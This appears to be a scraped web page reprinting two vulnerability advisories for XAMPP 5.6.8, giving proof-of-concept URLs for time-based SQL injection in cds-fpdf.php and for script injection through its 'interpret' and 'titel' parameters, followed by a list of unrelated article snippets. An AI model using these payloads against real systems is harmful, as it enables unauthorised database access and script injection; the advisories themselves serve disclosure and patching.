<!--

# Exploit Title: SQL injection in XAMPP 5.6. (and previous)

# Date: --

# Exploit Author: Rafael Pedrero

# Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/

# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/

# Version: XAMPP 5.6.

# Tested on: All

# CVE : CVE--

# Category: webapps

. Description

XAMPP through 5.6. allows SQL injection via the cds-fpdf.php jahr parameter. NOTE: This product is discontinued. Affected Product Code Base XAMPP 1.8. (and previous).

. Proof of Concept

http://localhost/xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29

. Solution:

The product is discontinued. Update to last version.

Reference:

https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/

https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.5.19/

https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/

-->

<!--

# Exploit Title: Cross Site Scripting in XAMPP 5.6. (and previous)

# Date: --

# Exploit Author: Rafael Pedrero

# Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/

# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/

# Version: XAMPP 5.6.

# Tested on: All

# CVE : CVE--

# Category: webapps

. Description

XAMPP through 5.6. allows XSS via the cds-fpdf.php interpret or titel parameter. NOTE: This product is discontinued. Affected Product Code Base XAMPP 1.8. (and previous).

. Proof of Concept

First Request (not filter the characters's content): http://X.X.X.X/xampp/cds.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984

or Request: http://localhost/xampp/cds.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984

Second Request (to xss attack): http://X.X.X.X/xampp/cds-fpdf.php 

http://localhost/xampp/cds-fpdf.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984

http://localhost/xampp/cds-fpdf.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984

When cds-fpdf.php is loaded not filter the characters: <b><script>alert("XSS")</script></b></td><td class=tabval>

cds.php filter it: <td class=tabval><b><script>alert("XSS&quot</script></b></td><td class=tabval>

. Solution:

The product is discontinued. Update to last version.

Reference:

https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/

https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.5.19/

https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/

-->

[EXP]XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting的更多相关文章

  1. 数字雨Shopex 4.8.5 SQL Injection Exp

    # -*- coding:utf-8 -* #Author:MXi4oyu #Email:798033502@qq.com #Shopex 4.8.5 SQL Injection Exp #转载请说明 ...

  2. Cacti /graphs_new.php SQL Injection Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 other SQL injection vulnerability ...

  3. druid sql黑名单 报异常 sql injection violation, part alway true condition not allow

    最近使用druid,发现阿里这个连接池 真的很好用,可以监控到连接池活跃连接数 开辟到多少个连接数 关闭了多少个,对于我在项目中查看错误 问题,很有帮助, 但是最近发现里面 有条sql语句 被拦截了, ...

  4. PHP+MYSQL网站SQL Injection攻防

    程序员们写代码的时候讲究TDD(测试驱动开发):在实现一个功能前,会先写一个测试用例,然后再编写代码使之运行通过.其实当黑客SQL Injection时,同样是一个TDD的过程:他们会先尝试着让程序报 ...

  5. SQL Injection(SQL注入漏洞)

    审计前准备: 1.安�php程序(推荐phpStudy) 2.高亮编辑器(推荐 Sublimetext Notepad++) 3.新建一个文本,复制以下变量,这些变量是审计中需要在源码中寻找的 ### ...

  6. HP+MYSQL网站SQL Injection攻防

    WebjxCom提示:程序员们写代码的时候讲究TDD(测试驱动开发):在实现一个功能前,会先写一个测试用例,然后再编写代码使之运行通过.其实当黑客SQL Injection时,同样是一个TDD的过程: ...

  7. ecshop /search.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞 ...

  8. ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过滤处理,导出 ...

  9. How to prevent SQL injection attacks?

    In our earlier tutorial on SQL Injection, one way to have prevented the SQL injection attack was by ...

随机推荐

  1. php curl抓取类分享

    class UsualFunForNetWorkHelper { /*** * post请求数据 */ public static function HttpsPost($url, $data = n ...

  2. 在Laravel中使用mongoDB

    https://blog.csdn.net/weixin_38682852/article/details/80840678?utm_source=blogxgwz1 https://blog.csd ...

  3. 651. 4 Keys Keyboard复制粘贴获得的最大长度

    [抄题]: Imagine you have a special keyboard with the following keys: Key 1: (A): Print one 'A' on scre ...

  4. Percentage&Last zero&Convert from char to float

    Percentage g_rate = wg_header-rate. condense g_rate. SHIFT g_rate RIGHT DELETING TRAILING '0'. REPLA ...

  5. centos查看系统版本

    显示系统版本 cat /etc/redhat-release cat /proc/version uname -a 查看位数 file /bin/ls

  6. 别人的Linux私房菜(12)正则表达式与文件格式化处理

    vi gerp awk sed支持正则表达式   cp ls不支持,只能使用bash本身的通配符 正则表达式分为基础正则表达式和拓展正则表达式 使用正则表达式注意语系的影响 http://cn.lin ...

  7. HTML5 添加新的标签 input属性

    <!-- 新增 有语意标签 --> <nav></nav> <!-- 导航标签 --> <seclion></seclion> ...

  8. 无网情况下linux安装django

    创建虚拟环境~/project/hanqin/django> virtualenv monitor2~/project/hanqin/django/monitor2> cd bin~/pr ...

  9. android-glsurfaceview Activity框架程序

    两个基本的类让我们使用OpenGL ES API来创建和操纵图形:GLSurfaceView和 GLSurfaceView.Renderer. 1. GLSurfaceView: 这是一个视图类,你可 ...

  10. AJAX笔记整理

    AJAX: Asynchronous JavaScript and XML,异步的Javascirpt和Xml. Asynchronous:异步 与之对应的是 synchronous:同步,我们要知道 ...